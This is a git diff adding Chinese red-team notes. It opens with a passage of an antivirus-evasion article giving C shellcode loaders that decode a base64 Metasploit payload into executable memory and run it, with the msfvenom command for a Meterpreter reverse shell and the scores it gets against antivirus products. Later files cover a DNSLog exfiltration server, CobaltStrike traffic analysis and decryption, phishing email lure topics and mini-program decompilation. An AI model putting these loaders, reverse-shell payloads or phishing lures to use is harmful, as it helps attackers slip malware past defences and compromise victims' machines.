unsigned char *)bufcoded; + while (pr2six[*(bufin++)] <= 63); + + nprbytes = (bufin - (const unsigned char *)bufcoded) - 1; + nbytesdecoded = ((nprbytes + 3) / 4) * 3; + + return nbytesdecoded + 1; +} + +int Base64decode(char *bufplain, const char *bufcoded) +{ + int nbytesdecoded; + register const unsigned char *bufin; + register unsigned char *bufout; + register int nprbytes; + + bufin = (const unsigned char *)bufcoded; + while (pr2six[*(bufin++)] <= 63); + nprbytes = (bufin - (const unsigned char *)bufcoded) - 1; + nbytesdecoded = ((nprbytes + 3) / 4) * 3; + + bufout = (unsigned char *)bufplain; + bufin = (const unsigned char *)bufcoded; + + while (nprbytes > 4) { + *(bufout++) = + (unsigned char)(pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4); + *(bufout++) = + (unsigned char)(pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2); + *(bufout++) = + (unsigned char)(pr2six[bufin[2]] << 6 | pr2six[bufin[3]]); + bufin += 4; + nprbytes -= 4; + } + + /* Note: (nprbytes == 1) would be an error, so just ingore that case */ + if (nprbytes > 1) { + *(bufout++) = + (unsigned char)(pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4); + } + if (nprbytes > 2) { + *(bufout++) = + (unsigned char)(pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2); + } + if (nprbytes > 3) { + *(bufout++) = + (unsigned char)(pr2six[bufin[2]] << 6 | pr2six[bufin[3]]); + } + + *(bufout++) = '\0'; + nbytesdecoded -= (4 - nprbytes) & 3; + return nbytesdecoded; +} + +static const char basis_64[] = +"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; + +int Base64encode_len(int len) +{ + return ((len + 2) / 3 * 4) + 1; +} + +int Base64encode(char *encoded, const char *string, int len) +{ + int i; + char *p; + + p = encoded; + for (i = 0; i < len - 2; i += 3) { + *p++ = basis_64[(string[i] >> 2) & 0x3F]; + *p++ = basis_64[((string[i] & 0x3) << 4) | + ((int)(string[i + 1] & 0xF0) >> 4)]; + *p++ = basis_64[((string[i + 1] & 0xF) << 2) | + ((int)(string[i + 2] & 0xC0) >> 6)]; + *p++ = basis_64[string[i + 2] & 0x3F]; + } + if (i < len) { + *p++ = basis_64[(string[i] >> 2) & 0x3F]; + if (i == (len - 1)) { + *p++ = basis_64[((string[i] & 0x3) << 4)]; + // *p++ = '='; + } + else { + *p++ = basis_64[((string[i] & 0x3) << 4) | + ((int)(string[i + 1] & 0xF0) >> 4)]; + *p++ = basis_64[((string[i + 1] & 0xF) << 2)]; + } + //*p++ = '='; + } + + *p++ = '\0'; + return p - encoded; +} +``` + +`base64.h`文件内容: + +```c +#ifndef _BASE64_H_ +#define _BASE64_H_ + +#ifdef __cplusplus +extern "C" { +#endif + + int Base64encode_len(int len); + int Base64encode(char * coded_dst, const char *plain_src, int len_plain_src); + + int Base64decode_len(const char * coded_src); + int Base64decode(char * plain_dst, const char *coded_src); + +#ifdef __cplusplus +} +#endif + +#endif //_BASE64_H_ +``` + +`shellcode.c`文件内容: + +```c +#include +#include +#include + +#include "base64.h" + +unsigned char buf[] = +"msf base64 code here"; + +// 原po代码报错,这里做了一些强制转换和类型修正 +int main(int argc, const char* argv[]) { + + + char str1[1000] = { 0 }; + Base64decode(str1, (char*)buf); + LPVOID Memory; + Memory = VirtualAlloc(NULL, sizeof(str1), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); + memcpy(Memory, str1, sizeof(str1)); + ((void(*)())Memory)(); + return 0; +} +``` + +使用msf生成base64编码的shellcode: + +``` +msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 lhost=192.168.174.128 lport=6666 -f c > shell.c +``` + +把`shell.c`的内容复制到上面`shellcode.c`文件中。vs2019编译,关闭杀软,msf可成功上线。 + +打开杀软,火绒可以查杀,**360不能查杀**(原po火绒静态查杀会报毒,但行为检测没有反应,360全通过)。 + +virustotal.com查杀率为21/68(原po为28/69)。 + +![image-20220530152630449](./images/202205301526558.png) + +### 方法8 base64加密2(VT免杀率17/67) + +另外一种base64加密方式,和方法7类似,实现代码略有不同。 + +`base64.c`文件内容: + +```c +// +// base64.c +// base64 +// +// Created by guofu on 2017/5/25. +// Copyright © 2017年 guofu. All rights reserved. +// +/** +* 转解码过程 +* 3 * 8 = 4 * 6; 3字节占24位, 4*6=24 +* 先将要编码的转成对应的ASCII值 +* 如编码: s 1 3 +* 对应ASCII值为: 115 49 51 +* 对应二进制为: 01110011 00110001 00110011 +* 将其6个分组分4组: 011100 110011 000100 110011 +* 而计算机是以8bit存储, 所以在每组的高位补两个0如下: +* 00011100 00110011 00000100 00110011对应:28 51 4 51 +* 查找base64 转换表 对应 c z E z +* +* 解码 +* c z E z +* 对应ASCII值为 99 122 69 122 +* 对应表base64_suffix_map的值为 28 51 4 51 +* 对应二进制值为 00011100 00110011 00000100 00110011 +* 依次去除每组的前两位, 再拼接成3字节 +* 即: 01110011 00110001 00110011 +* 对应的就是s 1 3 +*/ + +#include "base64.h" + +#include +#include + +// base64 转换表, 共64个 +static const char base64_alphabet[] = { + 'A', 'B', 'C', 'D', 'E', 'F', 'G', + 'H', 'I', 'J', 'K', 'L', 'M', 'N', + 'O', 'P', 'Q', 'R', 'S', 'T', + 'U', 'V', 'W', 'X', 'Y', 'Z', + 'a', 'b', 'c', 'd', 'e', 'f', 'g', + 'h', 'i', 'j', 'k', 'l', 'm', 'n', + 'o', 'p', 'q', 'r', 's', 't', + 'u', 'v', 'w', 'x', 'y', 'z', + '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', + '+', '/' }; + +// 解码时使用 +static const unsigned char base64_suffix_map[256] = { + 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 253, 255, + 255, 253, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, + 255, 255, 255, 255, 255, 255, 255, 255, 253, 255, 255, 255, + 255, 255, 255, 255, 255, 255, 255, 62, 255, 255, 255, 63, + 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 255, 255, + 255, 254, 255, 255, 255, 0, 1, 2, 3, 4, 5, 6, + 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, + 19, 20, 21, 22, 23, 24, 25, 255, 255, 255, 255, 255, + 255, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, + 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, + 49, 50, 51, 255, 255, 255, 255, 255, 255, 255, 255, 255, + 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, + 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, + 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, + 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, + 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, + 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, + 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, + 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, + 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, + 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, + 255, 255, 255, 255 }; + +static char cmove_bits(unsigned char src, unsigned lnum, unsigned rnum) { + src <<= lnum; // src = src << lnum; + src >>= rnum; // src = src >> rnum; + return src; +} + +int base64_encode(const char *indata, int inlen, char *outdata, int *outlen) { + + int ret = 0; // return value + if (indata == NULL || inlen == 0) { + return ret = -1; + } + + int in_len = 0; // 源字符串长度, 如果in_len不是3的倍数, 那么需要补成3的倍数 + int pad_num = 0; // 需要补齐的字符个数, 这样只有2, 1, 0(0的话不需要拼接, ) + if (inlen % 3 != 0) { + pad_num = 3 - inlen % 3; + } + in_len = inlen + pad_num; // 拼接后的长度, 实际编码需要的长度(3的倍数) + + int out_len = in_len * 8 / 6; // 编码后的长度 + + char *p = outdata; // 定义指针指向传出data的首地址 + + //编码, 长度为调整后的长度, 3字节一组 + for (int i = 0; i < in_len; i += 3) { + int value = *indata >> 2; // 将indata第一个字符向右移动2bit(丢弃2bit) + char c = base64_alphabet[value]; // 对应base64转换表的字符 + *p = c; // 将对应字符(编码后字符)赋值给outdata第一字节 + + //处理最后一组(最后3字节)的数据 + if (i == inlen + pad_num - 3 && pad_num != 0) { + if (pad_num == 1) { + *(p + 1) = base64_alphabet[(int)(cmove_bits(*indata, 6, 2) + cmove_bits(*(indata + 1), 0, 4))]; + *(p + 2) = base64_alphabet[(int)cmove_bits(*(indata + 1), 4, 2)]; + *(p + 3) = '='; + } + else if (pad_num == 2) { // 编码后的数据要补两个 '=' + *(p + 1) = base64_alphabet[(int)cmove_bits(*indata, 6, 2)]; + *(p + 2) = '='; + *(p + 3) = '='; + } + } + else { // 处理正常的3字节的数据 + *(p + 1) = base64_alphabet[cmove_bits(*indata, 6, 2) + cmove_bits(*(indata + 1), 0, 4)]; + *(p + 2) = base64_alphabet[cmove_bits(*(indata + 1), 4, 2) + cmove_bits(*(indata + 2), 0, 6)]; + *(p + 3) = base64_alphabet[*(indata + 2) & 0x3f]; + } + + p += 4; + indata += 3; + } + + if (outlen != NULL) { + *outlen = out_len; + } + + return ret; +} + + +int base64_decode(const char *indata, int inlen, char *outdata) { + + int ret = 0; + if (indata == NULL || inlen <= 0 || outdata == NULL ) { + return ret = -1; + } + if (inlen % 4 != 0) { // 需要解码的数据不是4字节倍数 + return ret = -2; + } + + int t = 0, x = 0, y = 0, i = 0; + unsigned char c = 0; + int g = 3; + + while (indata[x] != 0) { + // 需要解码的数据对应的ASCII值对应base64_suffix_map的值 + c = base64_suffix_map[indata[x++]]; + if (c == 255) return -1;// 对应的值不在转码表中 + if (c == 253) continue;// 对应的值是换行或者回车 + if (c == 254) { c = 0; g--; }// 对应的值是'=' + t = (t << 6) | c; // 将其依次放入一个int型中占3字节 + if (++y == 4) { + outdata[i++] = (unsigned char)((t >> 16) & 0xff); + if (g > 1) outdata[i++] = (unsigned char)((t >> 8) & 0xff); + if (g > 2) outdata[i++] = (unsigned char)(t & 0xff); + y = t = 0; + } + } + + return ret; +} +``` + +`base64.h`文件内容: + +```c +#ifndef base64_h +#define base64_h + +#include + +#if __cplusplus +extern "C" { +#endif + + int base64_encode(const char *indata, int inlen, char *outdata, int *outlen); + int base64_decode(const char *indata, int inlen, char *outdata); + +#if __cplusplus +} +#endif + +#endif /* base64_h */ +``` + +`shellcode.c`文件内容: + +```c +#include +#include +#include + +#include "base64.h" + +unsigned char buf[] = +"msf base64 code"; + +int main(int argc, const char * argv[]) { + + + char str3[1000] = { 0 }; + + // 原po代码报错,这里做了一些强制转换和类型修正 + base64_decode(buf, (int)strlen(buf), str3); + + char *Memory; + + Memory = VirtualAlloc(NULL, sizeof(str3), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); + + memcpy(Memory, str3, sizeof(str3)); + + ((void(*)())Memory)(); + + return 0; +} +``` + +使用msf生成base64编码的shellcode: + +``` +msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 lhost=192.168.174.128 lport=6666 -f c > shell.c +``` + +把`shell.c`的内容复制到上面`shellcode.c`文件中。vs2019编译,关闭杀软,msf可成功上线。 + +打开杀软,火绒可以查杀,**360不能查杀**。 + +virustotal.com上查杀率为17/67(原po为28/69)。 + +![image-20220530155809229](./images/202205301558330.png) + +## 总结 + +与2020年相比,2022年卷了很多。纵览360和火绒就能直观感受到,确实杀软能力越来越强了。2020年可以Bypass卡巴斯基、McAfee、Symantec等杀软的方法,2022年均失效。 + +免杀操作层出不穷,特别是近两年也有很多新的优秀项目。本文仅为最基本的免杀方式,前路漫漫,还有很多要学习的,共勉。 + +一些知识点: + +- 常见免杀工具(21种):msf自免杀、Veil、Venom、Shellter、BackDoor-Factory、Avet、TheFatRat、Avoidz、Green-Hat-Suite、zirikatu、AVIator、DKMC、Unicorn、Python-Rootkit、DKMC、Unicorn、Python-Rootkit、ASWCrypter、nps_payload、GreatSCT、HERCULES、SpookFlare、SharpShooter、CACTUSTORCH、Winpayload等。 +- 常见免杀编程语言:C/C++、C#、python、powershell、ruby、go等。 +- 常见免杀白名单程序(113个):Rundll32.exe、Msiexec.exe、MSBuild.exe、InstallUtil.exe、Mshta.exe、Regsvr32.exe、Cmstp.exe、CScript.exe、WScript.exe、Forfiles.exe、te.exe、Odbcconf.exe、InfDefaultInstall.exe、Diskshadow.exe、PsExec.exe、Msdeploy.exe、Winword.exe、Regasm.exe、Regsvcs.exe、Ftp.exe、pubprn.vbs、winrm.vbs、slmgr.vbs、Xwizard.exe、Compiler.exe、IEExec.exe、MavInject32、Presentationhost.exe、Wmic.exe、Pcalua.exe、Url.dll、zipfldr.dll、Syncappvpublishingserver.vbs等。 + +## 参考链接 + +- BypassAntiVirus:远控免杀系列文章 https://github.com/TideSec/BypassAntiVirus +- AntivirusScanner:杀软进程检测脚本 https://github.com/Threekiii/Awesome-Redteam/tree/master/scripts/AntivirusScanner \ No newline at end of file diff --git "a/tips/\345\206\205\347\275\221\346\270\227\351\200\217-\351\232\220\350\227\217.md" "b/tips/\345\206\205\347\275\221\346\270\227\351\200\217-\351\232\220\350\227\217.md" new file mode 100644 index 0000000..fbf05ae --- /dev/null +++ "b/tips/\345\206\205\347\275\221\346\270\227\351\200\217-\351\232\220\350\227\217.md" @@ -0,0 +1,16 @@ +# 内网渗透-隐藏 + +## Before + +### Chrome默认以无痕模式启动 + +- Chrome快捷方式→右键属性→快捷方式→目标(T) + +- 添加 `-incognito`属性: + +``` +"C:\Program Files\Google\Chrome\Application\chrome.exe" -incognito +``` + +![](images/202210081129886.png) + diff --git "a/tips/\345\256\211\345\205\250\346\236\266\346\236\204-\347\275\221\347\273\234\346\224\273\345\207\273\344\270\216\351\230\262\345\276\241\345\233\276\350\260\261.svg" "b/tips/\345\256\211\345\205\250\346\236\266\346\236\204-\347\275\221\347\273\234\346\224\273\345\207\273\344\270\216\351\230\262\345\276\241\345\233\276\350\260\261.svg" new file mode 100644 index 0000000..3e1de1c --- /dev/null +++ "b/tips/\345\256\211\345\205\250\346\236\266\346\236\204-\347\275\221\347\273\234\346\224\273\345\207\273\344\270\216\351\230\262\345\276\241\345\233\276\350\260\261.svg" @@ -0,0 +1,1164 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git "a/tips/\345\271\263\345\217\260\346\220\255\345\273\272-DNS Log.md" "b/tips/\345\271\263\345\217\260\346\220\255\345\273\272-DNS Log.md" new file mode 100644 index 0000000..93a31ef --- /dev/null +++ "b/tips/\345\271\263\345\217\260\346\220\255\345\273\272-DNS Log.md" @@ -0,0 +1,64 @@ +# DNS Log平台搭建 + +## DNS Log简介 + +在某些情况下,无法利用漏洞获得回显。但是,如果目标可以发送DNS请求,则可以通过DNS Log方式将想获得的数据外带出来(oob)。 + +DNS log常用于以下情况: + +- SQL盲注 +- 无回显的命令执行 +- 无回显的SSRF + +## 搭建DNS Log平台 + +### 前期准备 + +一台VPS: + +``` +1.1.1.1 +``` + +两个域名: + +``` +a.com +b.com +``` + +在`b.com`中添加两个A记录: + +![image-20220509150850946](./images/202205091508042.png) + +修改`a.com`的NS记录为: + +![image-20220509151352683](./images/202205091513716.png) + +### 项目部署 + +参考开源项目DNSlog-GO: + +- https://github.com/lanyi1998/DNSlog-GO + +VPS防火墙放行53端口、80端口,修改配置文件`config.ini`: + +``` +[HTTP] +Port = 80 +Token = , +ConsoleDisable = false + +[DNS] +Domain = a.com +``` + +运行`main`文件: + +``` +./main +``` + +### 使用测试 + +![image-20220509152556402](./images/202205091525438.png) \ No newline at end of file diff --git "a/tips/\346\265\201\351\207\217\345\210\206\346\236\220-CobaltStrike.md" "b/tips/\346\265\201\351\207\217\345\210\206\346\236\220-CobaltStrike.md" new file mode 100644 index 0000000..7950de1 --- /dev/null +++ "b/tips/\346\265\201\351\207\217\345\210\206\346\236\220-CobaltStrike.md" @@ -0,0 +1,242 @@ +# 流量分析-CobaltStrike + +参考链接: + +- 浅析CobaltStrike流量解密 https://5ime.cn/cobaltstrike-decrypt.html + +## 流量特征 + +http-beacon 通信中,默认使用 GET 方法向 `/dpixel` 、`/__utm.gif` 、`/pixel.gif` 等地址发起请求,同时,Cobalt Strike 的 Beacon 会将元数据(例如AES密钥)使用 RSA 公钥加密后发送给 C2 服务器。这些元数据通常被编码为 Base64 字符串并作为 Cookie 发送。 + +![](images/CobaltStrike流量分析/image-20231124103813576.png) + +下发指令的时候会请求 `/submit.php?id=一串数字` ,同时 POST 传递一串 0000 开头的16进制数据。 + +过滤 POST 请求包: + +``` +http.request.method==POST +``` + +![](images/CobaltStrike流量分析/image-20231124104222437.png) + + +https-beacon 通信中,默认使用空证书建立加密通道。 + +过滤 TLS 协议: + +``` +tls +``` + +![](images/CobaltStrike流量分析/image-20231124105107971.png) + +JA3 / JA3S 可以为客户端和服务器之间的通信创建 SSL 指纹。唯一签名可以表示从 Client Hello 数据包中的字段收集的几个值: + +- SSL Version +- Accepted Ciphers +- List of Extensions +- Elliptic Curves +- Elliptic Curve Formats + +几个已知的 `ja3` / `ja3s` 指纹信息,不同操作系统上是不一样的: + +``` +JA3 + +72a589da586844d7f0818ce684948eea +a0e9f5d64349fb13191bc781f81f42e1 +``` + +``` +JA3s + +b742b407517bac9536a77a7b0fee28e9 +ae4edc6faf64d08308082ad26be60767 +``` +## 流量解密 + + `.cobaltstrike.beacon_keys` 文件,该文件本质上为 `KeyPair` 的 Java 对象,Python 的 `javaobj-py3` 库可以直接读取里面存储的数据。 + +获取 `.cobaltstrike.beacon_keys` 文件中的 `RSA` 私钥,用于解密元数据: + +```python +import base64 +import javaobj.v2 as javaobj + +with open(".cobaltstrike.beacon_keys", "rb") as fd: +pobj = javaobj.load(fd) + +def format_key(key_data, key_type): +key_data = bytes(map(lambda x: x & 0xFF, key_data)) +formatted_key = f"-----BEGIN {key_type} KEY-----\n" +formatted_key += base64.encodebytes(key_data).decode() +formatted_key += f"-----END {key_type} KEY-----" +return formatted_key + +privateKey = format_key(pobj.array.value.privateKey.encoded.data, "PRIVATE") +publicKey = format_key(pobj.array.value.publicKey.encoded.data, "PUBLIC") + +print(privateKey) +print(publicKey) +``` + +通过私钥解密元数据,获取 `AES KEY`,其中 `encode_data` 为元数据,也就是前面提到的 `cookie` 的值。 + +`Cobalt Strike` 的 `Beacon` 通信主要依赖于 `AES key` 和 `HMAC key` 。这两个密钥都是由 `Beacon` 在每次执行时随机生成的 16字节数据。 + +- `AES key`:这个密钥用于加密和解密 `Beacon` 与 `C2` 服务器之间的通信内容。具体来说,它用于 `AES` 算法,该算法用于加密和解密Beacon任务的传输。 + +- `HMAC key` :这个密钥用于验证数据的完整性和真实性。`HMAC` (Hash-based Message Authentication Code)是一种基于密钥的哈希算法,用于在不安全的通信环境中验证消息的完整性和真实性。 +- +获取 `AES key` 和 `HMAC key`: + +```python +import hashlib +from Crypto.PublicKey import RSA +from Crypto.Cipher import PKCS1_v1_5 +import base64 +import hexdump +PRIVATE_KEY = """-----BEGIN PRIVATE KEY----- +{} +-----END PRIVATE KEY-----""" + +encode_data = "" + +private_key = RSA.import_key(PRIVATE_KEY.encode()) + +cipher = PKCS1_v1_5.new(private_key) +ciphertext = cipher.decrypt(base64.b64decode(encode_data), 0) + +if ciphertext[0:4] == b'\x00\x00\xBE\xEF': +raw_aes_keys = ciphertext[8:24] +raw_aes_hash256 = hashlib.sha256(raw_aes_keys).digest() +aes_key = raw_aes_hash256[0:16] +hmac_key = raw_aes_hash256[16:] + +print("AES key: {}".format(aes_key.hex())) +print("HMAC key: {}".format(hmac_key.hex())) + +hexdump.hexdump(ciphertext) +``` + +解密 `submit.php` 传递的 Data 。首先要先对该串16进制数据进行处理,转字符串后进行 `Base64` 编码: + +```python +import base64 + +encode_data = '' + +bytes_data = bytes.fromhex(encode_data) +encrypt_data = base64.b64encode(bytes_data) + +print(encrypt_data.decode()) +``` + +最终分别填入 `SHARED_KEY`,`HMAC_KEY`,`encrypt_data` 即可: + +```python +import hmac +import binascii +import base64 +import hexdump +from Crypto.Cipher import AES + +SHARED_KEY = binascii.unhexlify("") +HMAC_KEY = binascii.unhexlify("") +encrypt_data = "" + +def decrypt(encrypted_data, iv_bytes, signature, shared_key, hmac_key): +if hmac.new(hmac_key, encrypted_data, digestmod="sha256").digest()[:16] != signature: +print("message authentication failed") +return + +cipher = AES.new(shared_key, AES.MODE_CBC, iv_bytes) +return cipher.decrypt(encrypted_data) + +encrypt_data = base64.b64decode(encrypt_data) +encrypt_data_length = int.from_bytes(encrypt_data[:4], byteorder='big', signed=False) +encrypt_data_l = encrypt_data[4:] + +data1 = encrypt_data_l[:encrypt_data_length-16] +signature = encrypt_data_l[encrypt_data_length-16:encrypt_data_length] +iv_bytes = b"abcdefghijklmnop" + +dec = decrypt(data1, iv_bytes, signature, SHARED_KEY, HMAC_KEY) + +print("counter: {}".format(int.from_bytes(dec[:4], byteorder='big', signed=False))) +print("任务返回长度: {}".format(int.from_bytes(dec[4:8], byteorder='big', signed=False))) +print("任务输出类型: {}".format(int.from_bytes(dec[8:12], byteorder='big', signed=False))) +print(dec[12:int.from_bytes(dec[4:8], byteorder='big', signed=False)]) +print(hexdump.hexdump(dec)) +``` + +综合了以上流程的 CobaltStrike 流量解密脚本: + +``` +file_path = ".cobaltstrike.beacon_keys路径" +encode_data = "元数据" +encrypt_data = "任务数据" +``` + +```python +import hmac +import base64 +import hashlib +import hexdump +import binascii +import javaobj.v2 as javaobj +from Crypto.Cipher import AES +from Crypto.PublicKey import RSA +from Crypto.Cipher import PKCS1_v1_5 + +file_path = ".cobaltstrike.beacon_keys" +encode_data = "PcdKQuOPNdlyJMzB9IdLt3FyYJK5ooh2hagReIiCPX3enVE8IUWclknGedXTxAW6Seq0pUuqbA3d6h59a43lQH+2l4egkNL/aTuaMndjIcrM7HFHDQSumu/VoeG+O9vNB63W6YtJDidYt+SjFCZPOjcTblEU+CDGzN4xNO+bh1s=" +encrypt_data = "000000c0cc3581241436712c84735d65bf5faa7ac3da1ac1b7583bea79d54c00c517866397786623818cb11af81460bf963e7da0be7bd4c8afc27d4d7efb783ce7d3a889d14dada2a851f0b2919af4242efdc0e43ad80053b5d7ffc933416ec0861d24280f6d80bf6baf39264c534296b81635f8b2ce9824f03839f1aa4a2941186bed40820296e5637b168ad6bac0801c6c79e2c63f0319e9b12434854c0721cc34a323f044b630b2796478f6802590774d1a83f769fb1e2bfb1c577bfe02d958f5b41c" + +def format_key(key_data): + key_data = bytes(map(lambda x: x & 0xFF, key_data)) + formatted_key = f"-----BEGIN PRIVATE KEY-----\n" + formatted_key += base64.encodebytes(key_data).decode() + formatted_key += f"-----END PRIVATE KEY-----" + return formatted_key + +def decrypt(encrypted_data, iv_bytes, signature, shared_key, hmac_key): + if hmac.new(hmac_key, encrypted_data, digestmod="sha256").digest()[:16] != signature: + print("message authentication failed") + return + + cipher = AES.new(shared_key, AES.MODE_CBC, iv_bytes) + return cipher.decrypt(encrypted_data) + +with open(file_path, "rb") as fd: + pobj = javaobj.load(fd) + +PRIVATE_KEY = format_key(pobj.array.value.privateKey.encoded.data) +private_key = RSA.import_key(PRIVATE_KEY.encode()) +cipher = PKCS1_v1_5.new(private_key) +ciphertext = cipher.decrypt(base64.b64decode(encode_data), 0) + +if ciphertext[0:4] == b'\x00\x00\xBE\xEF': + raw_aes_keys = ciphertext[8:24] + raw_aes_hash256 = hashlib.sha256(raw_aes_keys).digest() + aes_key = raw_aes_hash256[0:16] + hmac_key = raw_aes_hash256[16:] + +SHARED_KEY = binascii.unhexlify(aes_key.hex()) +HMAC_KEY = binascii.unhexlify(hmac_key.hex()) + +encrypt_data = base64.b64encode(bytes.fromhex(encrypt_data)).decode() +encrypt_data = base64.b64decode(encrypt_data) +encrypt_data_length = int.from_bytes(encrypt_data[:4], byteorder='big', signed=False) +encrypt_data_l = encrypt_data[4:] +data1 = encrypt_data_l[:encrypt_data_length-16] +signature = encrypt_data_l[encrypt_data_length-16:encrypt_data_length] +iv_bytes = b"abcdefghijklmnop" + +dec = decrypt(data1, iv_bytes, signature, SHARED_KEY, HMAC_KEY) +print("AES key: {}".format(aes_key.hex())) +print("HMAC key: {}".format(hmac_key.hex())) +print(dec[12:int.from_bytes(dec[4:8], byteorder='big', signed=False)]) +print(hexdump.hexdump(dec)) +``` diff --git "a/tips/\346\265\201\351\207\217\345\210\206\346\236\220-Webshell.pdf" "b/tips/\346\265\201\351\207\217\345\210\206\346\236\220-Webshell.pdf" new file mode 100644 index 0000000..4cc2b7d Binary files /dev/null and "b/tips/\346\265\201\351\207\217\345\210\206\346\236\220-Webshell.pdf" differ diff --git "a/tips/\347\244\276\344\274\232\345\267\245\347\250\213\345\255\246-\351\222\223\351\261\274\351\202\256\344\273\266\344\270\273\351\242\230\346\261\207\346\200\273.md" "b/tips/\347\244\276\344\274\232\345\267\245\347\250\213\345\255\246-\351\222\223\351\261\274\351\202\256\344\273\266\344\270\273\351\242\230\346\261\207\346\200\273.md" new file mode 100644 index 0000000..06e70f6 --- /dev/null +++ "b/tips/\347\244\276\344\274\232\345\267\245\347\250\213\345\255\246-\351\222\223\351\261\274\351\202\256\344\273\266\344\270\273\351\242\230\346\261\207\346\200\273.md" @@ -0,0 +1,48 @@ +# 社会工程学-钓鱼邮件主题汇总 + +## 薪酬福利 + +- 薪资调整 +- 高温津贴 +- 工服领取 +- 礼品领取 +- 节假日福利 +- 薪资结构调整 + +## 热门话题 + +- 疫情防控 +- 防汛抗灾 +- 大运会 / 亚运会等 + +## 工作邮件 + +- 求职简历/自荐信 +- 员工转正申请 +- 猎头招聘 +- 合作详情见附件 + +## 官方通知 + +- 邮件发送图片二维码 +- 邮箱容量升级 +- 能力提升培训 +- 个人所得税年度汇算清缴 +- 学习强国/主题教育 +- 食堂问卷/物业调研 + +## 投诉建议 + +- 违规收取费用投诉 +- 用户针对某事项的投诉建议 +- 失职公告/责任通报(可以但不建议哈) + +## 安全相关 + +- 攻防演练注意事项 +- 钓鱼邮件风险提示 +- 安全漏洞补丁升级 +- 红队内部资料分享 +- 蓝队威胁情报共享 +- 0day漏洞排查通知 +- 0day漏洞检查工具/自查工具/利用工具 \ No newline at end of file diff --git "a/tips/\351\200\206\345\220\221\345\210\206\346\236\220-\345\276\256\344\277\241\345\260\217\347\250\213\345\272\217\345\217\215\347\274\226\350\257\221.md" "b/tips/\351\200\206\345\220\221\345\210\206\346\236\220-\345\276\256\344\277\241\345\260\217\347\250\213\345\272\217\345\217\215\347\274\226\350\257\221.md" new file mode 100644 index 0000000..1ff986f --- /dev/null +++ "b/tips/\351\200\206\345\220\221\345\210\206\346\236\220-\345\276\256\344\277\241\345\260\217\347\250\213\345\272\217\345\217\215\347\274\226\350\257\221.md" @@ -0,0 +1,83 @@ +# 逆向分析-微信小程序反编译 + +## 一、工具及环境 + +### 0x01 解密/逆向工具 + +解密工具:UnpackMiniApp + +逆向工具:wxappUnpacker + +### 0x02 环境配置 + +使用 wxappUnpacker 需要配置 nodejs 环境。输入 node -v 检查是否已经安装 nodejs。如果没有安装,在 https://nodejs.org/en/ 下载安装。 + +依次 npm install 以下依赖: + +``` +npm install +npm install esprima +npm install css-tree +npm install cssbeautify +npm install vm2 +npm install uglify-es +npm install js-beautify +``` + +## 二、生成小程序包 + +微信 PC 端默认的小程序包位置在 C 盘,具体位置点击 `微信 -> 文件管理` 